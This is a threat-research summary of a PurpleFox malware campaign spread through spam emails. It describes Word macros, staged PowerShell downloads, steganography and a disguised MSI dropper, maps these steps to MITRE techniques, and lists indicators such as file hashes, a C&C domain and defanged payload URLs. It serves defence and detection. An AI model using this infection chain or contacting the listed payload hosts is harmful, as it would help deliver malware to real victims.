Threat Research

PurpleFox Resurfaces Via Spam Emails:  A Look Into Its Recent Campaign – Cyble

Securonix

Cyble’s CRIL analyzes a PurpleFox campaign delivered via spam emails containing Word attachments, triggering multi-stage PowerShell payloads and steganography to hide the final MSI dropper. The operation culminates in PurpleFox payload deployment with anti-detection and persistence techniques, illustrating a layered, fileless-like infection chain. #PurpleFox #Cyble #CRIL #Steganography #PowerShell

Keypoints

  • Spam emails deliver a Word document attachment that initiates the infection chain.
  • A VBA macro fetches the first stage PowerShell code from a remote file when the document is opened.
  • The initial PowerShell script downloads a PNG image that hides a second-stage payload via steganography.
  • The second-stage PowerShell script downloads an MSI installer disguised as a JPG file, which is the PurpleFox payload.

MITRE Techniques

  • [T1566.001] Phishing – This malware reaches users via spam emails. ‘This malware reaches users via spam emails.’
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – Document contains embedded VBA macros, which executes code when the document is opened. ’embedded VBA macros’
  • [T1059.001] PowerShell – PowerShell commands are used to download the next stage payload. ‘PowerShell commands are used to download the next stage payload.’
  • [T1543.003] Windows Service – Uses sc.exe to modify the status of services. ‘Uses sc.exe to modify the status of services.’
  • [T1497] Anti-VM / Sandbox – Anti-detection techniques, VM artifact strings found in memory. ‘Anti-VM/Anti-Debug technique for evasion.’
  • [T1562.001] Disable or Modify Tools – The malware scans for VM and Debugger-related processes and terminates them. ‘The malware scans for VM and Debugger-related processes and terminates them.’
  • [T1036.008] Masquerading – Download files with a non-matching file extension (content does not match to file extension). ‘Download files with a non-matching file extension (content does not match to file extension).’
  • [T1112] Modify Registry – Uses reg.exe to modify the Windows registry. ‘Uses reg.exe to modify the Windows registry.’
  • [T1221] Template Injection – The sample has suspicious references in Office document templates to conceal malicious code or force authentication attempts. ‘The sample has suspicious references in Office document templates to conceal malicious code or force authentication attempts.’
  • [T1574.010] Services File Permissions Weakness – Uses cacls to modify the permissions of files. ‘Uses cacls to modify the permissions of files.’
  • [T1057] Process Discovery – Queries a list of all running processes. ‘Queries a list of all running processes.’
  • [T1012] Query Registry – The malware is examining the registry to extract system details. ‘The malware is examining the registry to extract system details.’
  • [T1082] System Information Discovery – The malware gathers system information through PowerShell, Command Prompt (cmd), and WMIC. ‘The malware gathers system information through PowerShell, Command Prompt (cmd), and WMIC.’
  • [T1518.001] Security Software Discovery – May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory). ‘May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory).’
  • [T1071] Application Layer Protocol – The malware uses TCP to interact with the C&C server. ‘The malware uses TCP to interact with the C&C server.’
  • [T1105] Ingress Tool Transfer – The malware has the ability to download files from C&C. ‘The malware has the ability to download files from C&C’

Indicators of Compromise

  • [File Hashes] Invoice-891920.docx – MD5: 70e254f2a86e0a49bb319c2af0e1a2cb, SHA1: bd13ecc3f3410986996b3bc0998549875aa171d3, SHA256: 1ddc7091d5bbe8d2105be4c2341f941f04cdeaaea05b89b6ee1456843b90fb04
  • [File Hashes] ID-231396590616.docm – MD5: 8c498f9e6dd65c5a9704208922224661, SHA1: 1dc2f872c2e23e1eb0c6090909c5807553ad1e75, SHA256: 38f581881093c044667d565a698aa389f14585a58d5c8b692dc2be851293f1c2
  • [File Hashes] Invoice-654931.doc – MD5: a7c5adccfeb31331edd0351c7b5fdde9, SHA1: a0fd6c29b81c629baa9c1311f177f715d6aee36f, SHA256: efe078fb3808c5b725d33df59da55aff0718534e31908280899c9859a0f2d1a8
  • [File Hashes] update.dotm – MD5: 405ddc04a06b883b12e1e152be599533, SHA1: 6c642417ba41c0c883c4f431de99513827d2858b, SHA256: d4e1cb27ce387ee1aedd8ebd69ec2f0a13e1d81bae6079061bd13f1a0a158026
  • [File Hashes] ace.jpg – MD5: def0a155618de548cc2902221d3890db, SHA1: db90e04683068fd16d5fbefbba4e7dd30adba306, SHA256: 540ba2c354ead0e80dd37fb41ae83f4ea98b52fcf2e124463b2a6d0d73bd2e05
  • [Domain] black-sun-a335.asyorfplmnv.workers.dev – C&C domain
  • [URL] hxxp://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/67856eed42115b6af39ecf6bb3e66f6ed8c13287/update.dotm – Template injection URL
  • [URL] hxxp://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg – 1st stage PowerShell script
  • [URL] hxxp://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/T2qomNwfFUeS/62f331959dde379b2536caed26a74ae8460c0c30/all.png – PNG with steganographic payload
  • [URL] hxxp://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/5hwtrLyyHFiv/7b0985c861986ec9e2087ade8273e544009d68e1/SsdxxIp8DqeQ.jpg – PurpleFox MSI payload disguised as JPG

Read more: https://cyble.com/blog/purplefox-resurfaces-via-spam-emails-a-look-into-its-recent-campaign/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint